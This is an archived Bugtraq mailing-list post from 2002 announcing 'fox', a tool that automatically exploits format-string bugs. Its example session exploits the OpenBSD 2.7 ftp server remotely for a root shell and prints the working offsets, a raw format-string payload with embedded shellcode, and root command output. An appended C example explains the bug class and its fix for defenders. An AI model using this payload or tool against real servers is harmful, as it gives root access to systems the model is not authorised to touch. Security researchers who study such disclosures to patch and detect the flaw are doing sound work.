Bugtraq mailing list archives
Re: Howto exploit a remote format bug automatically
From: Fredrik Widlund <fredrik.widlund () defcom com>
Date: Fri, 19 Apr 2002 12:57:52 +0100
Hi,

"fox", a tool I wrote for automatically exploiting any (or most) format bugs,
locally and remotely. Runs on OpenBSD and not ported to other platforms, though
it should be very straightforward. The only requirement is that you get the
actual printed string back to the program; in the case of the OpenBSD 2.7 ftpd
you need to proxy this through a small shell program since the output occurs
in the process listing. Should work for exploiting bugs on most little-endian
32-bit machines like the i386, providing you supply the shellcode.

Includes a trivial local example, and an example of how to point it at the
OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.

Regards,
Fredrik Widlund

-x-

README for example 2: Exploiting OpenBSD 2.7 ftp server

Input has to be < 256 characters, working offsets are -18 and -2

Ex:

    root@wolf> ./fox -s 220 -p 50 -o-18 ex2/ex2
    alignment 0
    chars before argument 111
    chars before insert 0
    argument offset 9
    argument pointer offset 0
    argument address 0xdfbfd15c
    esp 0xdfbfd138
    uid=0(root) gid=0(wheel) groups=0(wheel)
    root@wolf> nc 127.0.0.1 21
    id
    uid=0(root) gid=0(wheel) groups=0(wheel)
    uname -a
    OpenBSD wolf 2.7 GENERIC#0 i386
    cat /etc/hosts
    127.0.0.1 AAAA<81>ð<81>Ð<81>¿<81>ßBBBB<81>ñ<81>Ð<81>¿<81>ßCCCC<81>ò<81>Ð<81>¿<81>ßDDDD<81>ó<81>Ð<81>¿<81>ß%p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn<81>ëI<8B>$<81>Ã1<81>ÉQ<83><81>ÀP<89><81>Ã<83><81>ÃS<89>?<88>K<83><89>X<88>K <83><81>Ã<89><88>K<83><89>HP<81>¸;UUU%;<81>ª<81>ª<81>ª<81>Í<80>PP<81>¸UUU%<81>ª <81>ª<81>ª<81>Í<80><81>è<81>²<81>ÿ<81>ÿ<81>ÿ<81>ë<81>´[CODE_BY_LONEWOLF]/bin/shF-cGG/bin/shAxxxxxxxxxxxxx
    exit
    root@wolf>
Attachment:
fox0.1.tgz
Description: format bug exploiter
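The session above works because ftpd hands attacker-supplied text to a printf-style function as the format string, so the "%p" conversions read stack words and each "%0323x%hn" pair writes a 16-bit count through a pointer. The following C example is added here for illustration and is not part of fox or the original post: it places the vulnerable pattern beside the hardened form (a literal format with the user text passed only as data), and shows with a legitimate pointer what one "%0323x%hn" stores, which is the defect a code review or -Wformat-security warning should catch. The function names and buffers are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: user-controlled text is used as the format string.
 * Looks fine for "hello", but "%p" reads stack words and "%hn" writes
 * the running output count through a pointer taken from the stack. */
static int vulnerable_echo(char *out, size_t n, const char *user_input)
{
    return snprintf(out, n, user_input);  /* non-literal format: the bug */
}

/* Hardened form: the format is a literal and the user text is only data,
 * so "%p" or "%hn" inside it is copied verbatim and never interpreted. */
static int safe_echo(char *out, size_t n, const char *user_input)
{
    return snprintf(out, n, "%s", user_input);
}

/* What a single "%0323x%hn" does when the pointer is legitimate:
 * %0323x pads to 323 characters, %hn then stores that count as a
 * 16-bit value at the supplied address. Returns the stored value (323). */
static short hn_write_demo(void)
{
    char buf[512];                 /* constructed scratch buffer */
    short stored = 0;
    snprintf(buf, sizeof buf, "%0323x%hn", 0u, &stored);
    return stored;
}

/* Returns 1 if safe_echo leaves a hostile-looking input untouched. */
static int safe_echo_preserves(const char *input)
{
    char out[256];
    safe_echo(out, sizeof out, input);
    return strcmp(out, input) == 0;
}

int main(void)
{
    char out[64];
    vulnerable_echo(out, sizeof out, "hello");   /* benign input hides the bug */
    printf("benign echo: %s\n", out);
    printf("safe_echo keeps hostile input verbatim: %d\n",
           safe_echo_preserves("%p%p%p%0323x%hn"));
    printf("%%hn stored: %d\n", hn_write_demo());
    return 0;
}
```

Compiling with -Wall -Wformat -Wformat-security flags the non-literal call in vulnerable_echo, which is the cheapest way to find this class of bug before a tool like fox does.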
Current thread:
- Howto exploit a remote format bug automatically Frédéric Raynal (Apr 18)
- Re: Howto exploit a remote format bug automatically Fredrik Widlund (Apr 19)